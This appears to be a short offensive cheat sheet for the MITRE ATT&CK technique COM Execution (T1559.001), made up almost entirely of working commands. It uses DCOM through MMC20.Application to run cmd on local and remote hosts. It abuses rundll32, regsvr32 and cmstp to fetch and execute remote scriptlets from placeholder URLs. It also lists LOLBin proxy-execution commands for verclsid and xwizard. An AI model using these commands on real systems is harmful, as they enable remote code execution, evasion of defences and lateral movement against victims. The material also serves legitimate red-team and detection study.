COM Execution - T1559.001

$a = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("49B2791A-B1AE-4C90-9B8E-E860BA07F889"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")

$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")

$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","10.0.0.2"))
$a.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c C:\mtr.exe > c:\fromdcom.txt","7")

Rundll32.exe -sta {GUID}

Rundll32.exe -sta Scripting.Dictionary

# Using shell32 exported function
Rundll32.exe shell32.dll,SHCreateLocalServerRunDll {GUID}

# Running Scriptlet via JavaScript -> GetObject()
rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;document.write();GetObject(“script:http://127.0.0.1:8080/calc.sct").Exec();

# with Rundll32
rundll32.exe advpack.dll,LaunchINFSection path\to\test.inf,DefaultInstall_SingleUser,1

# Running Scriptlet locally // without touching the registry
regsvr32 /s /n /u /i:malware.sct

# COM Scriptlet via Regsvr32 from remote location // without touching the registry
regsvr32 /s /n /u /i:http://server/file.sct C:\Windows\system32\scrobj.dll

# INF File
# Running Scriptlet via CMSTP.exe INF-SCT file
[version]
Signature=$Chicago$
AdvancedINF=2.5
 
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
 
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://127.0.0.1:8080/test.sct
 
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="MalTrak"
ShortSvcName="MalTrak"

cmstp.exe /su test.inf

verclsid.exe /S /C {CLSID}

xwizard.exe RunWizard /taero /u {CLSID}